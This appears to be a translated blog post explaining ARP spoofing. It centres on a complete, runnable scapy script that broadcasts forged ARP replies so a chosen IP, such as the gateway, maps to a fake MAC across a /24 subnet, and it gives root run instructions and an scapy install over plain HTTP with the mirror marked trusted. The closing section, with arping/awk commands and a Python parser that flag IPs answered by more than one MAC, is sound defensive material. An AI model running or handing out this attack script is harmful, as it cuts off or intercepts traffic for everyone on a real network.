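Principle
Put simply, ARP is built on trusting everyone on the local network. When host A wants to communicate with host B, it sends a broadcast asking "Who is host B?", and normally B answers. Our attack script proactively broadcasts to all hosts that the MAC address for IP xx is xxx, so the other hosts can no longer obtain the correct address to communicate with.
ARP attack
The spoofing can target the MAC address of the egress gateway, or a specified address.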
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Author: LJ
Email: admin@attacker.club
Last Modified: 2019-10-24 09:28:48
Description: ARP attack
'''
# sudo python arp_attack.py 172.16.2.1
import sys,os,re
from scapy.all import *


def check_ip(ipAddr):
    # Raw string so the regex escapes (\d, \.) are not treated as string escapes
    compile_ip=re.compile(r'^(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)$')
    if compile_ip.match(ipAddr):
        return True
    else:
        return False


if __name__ == "__main__":
    attackIP=sys.argv[1]
    n=attackIP.split('.')[0:3]
    broadcastIP="{0}.{1}.{2}.0/24".format(n[0],n[1],n[2])
    if os.geteuid() != 0:
        print ("This program must be run as root. Aborting.")
        sys.exit()
    if check_ip(attackIP):
        srploop(Ether(dst="FF:FF:FF:FF:FF:FF")/ARP(pdst=broadcastIP, psrc=attackIP, hwsrc="00:66:66:66:66:66"), timeout=2)
    else:
        print(attackIP, "is not a IP!")
        print ("Please Use %s x.x.x.x" % (sys.argv[0]))
        sys.exit()
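Running it
pip install -i http://mirrors.aliyun.com/pypi/simple --trusted-host mirrors.aliyun.com scapy # install the Python module
sudo python arp_attack.py 172.16.2.1 # specify the IP to attack
IP conflict detection on Linux servers
arping is a tool for checking ARP responses
arping -c 1000 192.168.66.6 > record.txt # record the results of 1000 probes
awk '/\[/ {print $(NF-1)}' record.txt | sort -u # check for conflicting MACs; match lines containing '[' and print the second-to-last field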
Unicast reply from 192.168.66.6 [8A:77:A2:D3:B8:D2] 0.925ms
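The same check as the arping/awk pipeline above, written as an added example that is not part of the original post: it parses arping reply lines, normalizes MAC case, counts replies per MAC, and reports any IP answered by more than one MAC. The sample lines are constructed (the probing host 192.168.66.10 and interface eth0 are assumptions); the second MAC is the spoofed address used by the script above.

```python
import re
from collections import Counter, defaultdict

# Matches iputils-arping reply lines such as:
# "Unicast reply from 192.168.66.6 [8A:77:A2:D3:B8:D2]  0.925ms"
REPLY_RE = re.compile(
    r"^(?:Unicast|Broadcast) reply from (\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"\[([0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})\]"
)


def macs_per_ip(lines):
    """Return {ip: Counter({mac: reply_count})} from arping output lines."""
    seen = defaultdict(Counter)
    for line in lines:
        m = REPLY_RE.match(line.strip())
        if m:
            # Upper-case the MAC so the same address is not counted twice
            seen[m.group(1)][m.group(2).upper()] += 1
    return seen


def find_conflicts(lines):
    """Return {ip: [(mac, count), ...]} for IPs answered by more than one MAC."""
    return {
        ip: macs.most_common()
        for ip, macs in macs_per_ip(lines).items()
        if len(macs) > 1
    }


# Constructed sample of record.txt: one legitimate host plus one spoofed reply.
SAMPLE = """\
ARPING 192.168.66.6 from 192.168.66.10 eth0
Unicast reply from 192.168.66.6 [8A:77:A2:D3:B8:D2]  0.925ms
Unicast reply from 192.168.66.6 [00:66:66:66:66:66]  1.102ms
Unicast reply from 192.168.66.6 [8A:77:A2:D3:B8:D2]  0.871ms
Unicast reply from 192.168.66.6 [8a:77:a2:d3:b8:d2]  0.903ms
Sent 4 probes (1 broadcast(s))
Received 4 response(s)
""".splitlines()

if __name__ == "__main__":
    for ip, macs in find_conflicts(SAMPLE).items():
        print(f"{ip}: conflict, answered by {len(macs)} MACs")
        for mac, count in macs:
            print(f"  {mac}  {count} replies")
```

To check a real capture, pass the lines of record.txt to find_conflicts(); an empty result means every probed IP was answered by a single MAC.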